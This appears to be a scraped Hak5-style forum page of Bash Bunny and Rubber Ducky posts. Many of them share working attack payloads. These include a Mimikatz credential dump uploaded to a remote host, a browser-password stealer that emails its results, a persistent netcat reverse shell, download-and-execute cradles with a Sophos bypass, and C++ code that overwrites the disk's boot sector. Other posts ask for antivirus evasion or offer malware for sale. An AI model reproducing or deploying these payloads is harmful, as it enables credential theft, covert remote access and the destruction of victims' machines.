Search the Community

In Android env, I want to go to the previous screen. I tried `ESCAPE` and `BACKSPACE` but was not successful. Other commands such as DOWNARROW and ENTER work correctly. The screen is in About device (in the Settings) and I want to go one screen back.

Description : Exfiltrate github username and email Target : OSX Download : Github

Hi, According to the documentation the Q STRING command argument don't require quotes. During my work on an OSX layout for bb i discover this strange behavior : LED SETUP ATTACKMODE STORAGE HID LED ATTACK # Line 5-12 are just test to check if the command works well with and without quote # and that this behavior are the same on the short QUACK command QUACK STRING Hello World Q ENTER QUACK STRING "Hello World" Q ENTER Q STRING Hello World Q ENTER Q STRING "Hello World" Q ENTER Q STRING "<" Q ENTER Q STRING < Q ENTER LED FINISH Produce : Hello World Hello World Hello World Hello World < I expected Hello World Hello World Hello World Hello World < < < The bashbunny get stuck on line 15 (line 14 has been executed), my led stay in LED ATTACK forever. Seems that using the STRING command with symbol without quote make the bunny sick (i have made the test with others symbols). When trying to press the [<] key it the same it's stuck LED SETUP ATTACKMODE STORAGE HID LED ATTACK QUACK STRING Hello World Q ENTER QUACK STRING "Hello World" Q ENTER Q STRING Hello World Q ENTER Q STRING "Hello World" Q ENTER Q STRING "a" Q ENTER Q a Q ENTER Q STRING "<" Q ENTER Q < Q ENTER LED FINISH Is there something i miss understood or it's an issue ?

Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download

I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER

Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 😄

Running this on a windows 10 When I enter: STRING netsh wlan show profile “WiFi name” key=clear and run it in command prompt it works and shows the WiFi key in the clear for specified network but when I enter that line into the ducky encoder it changes the script to STRING netsh wlan show profile @wifi name@ key=clear and then the script no longer works What am I missing? What is the script to get quotations after encoding. Thanks!

Hi, I wanted to learn how to perform ATP attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using the SSH reverse tunnel. I find that if it will be my code it will not be detectable for AV. Unfortunately, the more I think about it, I come to the conclusion that once I have such a system shell, I still have to provide a meterpreter payload, which will allow for more advanced work, and it will definitely detect the anti-virus. I want to learn but I do not know what to do in such a situation. How to create a meterpreter payload that will not be detected by AV? I see that msvenom generates already encoded payload. Is it possible to get such a payload not encrypted? Maybe if I changed his sources in pure C, it would be less detectable? I've tried veil, shellter, thefatrat, etc. But it does not help. Most AV immediately detect payload. I am mainly interested in payloads on MS Windows. Later I want to try Android.

Hello there, i´m writing my first payload for the USB Rubber Ducky . I'd need a key combination to hide a window, the only problem i have is that i need to do something IN the window so i can't just ban it to the task bar. I hope you could help me. Greetings Ares

Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !

Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe

Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R

Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.

Hey guys, my name is Patrick. Im new in the hacking world, im learning. I have a question, I'm trying to download and execute a payload in my rubber ducky but I can't. This is the script: DELAY 2000 GUI r DELAY 1000 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://myserver/file.exe','C:\file.exe');&'C:\file.exe' ENTER Can someone help me please.

Hello I'm wondering if it is possible to use if and else statement with rubber ducky. I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work. Here is my payload : DELAY 1000 GUI r DELAY 500 STRING cmd /T:01 /K \"@echo ENTER DELAY 500 STRING mode con:cols=15 lines=1 ENTER DELAY 500 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe'); ENTER DELAY 500 STRING cd %tmp% ENTER DELAY 500 STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt DELAY 500 ENTER STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt ENTER DELAY 500 STRING start web.exe /stext pwd.txt ENTER DELAY 500 REM -------------email log STRING powershell ENTER DELAY 500 STRING $SMTPServer = 'smtp.mail.yahoo.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'user@yahoo.com' ENTER STRING $ReportEmail.To.Add('user2@yahoo.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('pwd.txt') ENTER STRING $ReportEmail.Attachments.Add('info.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 500 REM ---------------------delete and end STRING del web.exe ENTER DELAY 500 STRING exit ENTER DELAY 500 STRING del pwd.txt ENTER DELAY 500 STRING del info.txt ENTER DELAY 100 STRING exit ENTER My problem is this line " STRING start web.exe /stext pwd.txt " doesn't work on windows 8 and 10 only on in windows 7. I try to do in this way " STRING start web.exe /stext > pwd.txt " it create a pw.txt but it is empty. Any idea it is appreciated !

Hello Everyone, You may have seen my last post on the iMessage Taker. It was unstable and had timing issues. Well today I am here to rectify the situation. I have vastly improved the script to allow for much quicker operation and reliability. Basically the ducky script is quite small and edits a "scpt" that it downloads from a Repo of mine. This script does require internet connection. In order to change the script to send the Messages to your email all you need to do is change "YOUREMAIL" to your preferred email. It will then take iMessages from the computer and send them to you. Short and Sweet! Enjoy! -wiredbrother https://pastebin.com/3fgET9zU P.S Would love everyone's though on this.

Hey all, first post here! I am working on a payload that, when connected to an unlocked Android device, will open the Gmail, attach a number of files, and then send the email. I am having issues with opening the "attach files" menu (the paperclip icon) because I cannot seem to see a way to get the keyboard to tab over to it. Here is what I have so far, tested on a Pixel XL, latest version, with a HP USB Keyboard. Windows + G > Opens Gmail CTRL + N > Create new email someone@domain.com > Enter in the desired destination email. ENTER > Confirms the email address you entered TAB TAB > Moves cursor to Subject Line > Add an email subject. TAB > Moves cursor to body. Text. > Add text to body. Magic happens? This is where I cannot click the paperclip icon, but if I do it on the touch screen, I can finish it out with the keyboard... SHIFT + DOWN ARROW > Selects file(s). SHIFT + ENTER > Attaches files. CTRL + ENTER > Send the email. Any help or thoughts would be greatly appreciated! Cheers!

Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius

How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting

I am not sure if this is the right bored to be talking about this I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins. It could do just about anything you want example: Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc pm me if your interested

Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack

Please bare with me this is a very nube question. In bash bunny. Lets say in payload - Switch1 - payload.txt What would be the syntax to run another payload.txt say from " payloads/library/test/payload.txt " So payload/switch1/payload.txt would execute and run payloads/library/test/payload.txt " Thanks in advance, I know it's a very basic question..

I'm new to the bash bunny but have had the rubber ducky since the beginning. Very basic question, Which I guess I can test when I have some time. Since we now have a Payload folder outside of the switch payload. Can we inside the switch payload txt just point to another payload text thats in the Payload folder. Again I know this is probably a very basic question, However I didn't see any documentation anywhere. I would be nice to reference one or multiple other payloads from one script

I have a rubber ducky with the latest firmware and when trying to deploy a payload on my MS Windows 7 company Pcs and laptops nothing happens. But if I press the deploy button it works. The ducky is working correctly because I am able to deploy payloads on Linux machines using the same hardware as the Windows PC's, and external PC's running Windows 7. All out computers are from Dell and we have a myriad of models (Optiplex, Latitude, etc) running Windows 7 and 10, we are using ESET Endpoint Antivirus with real time file system protection activated. I am inclined that the ducky is not working because some software is blocking it. Perhaps ESET.??? I will appreciate if anyone can comment on this issue. Thanks. met.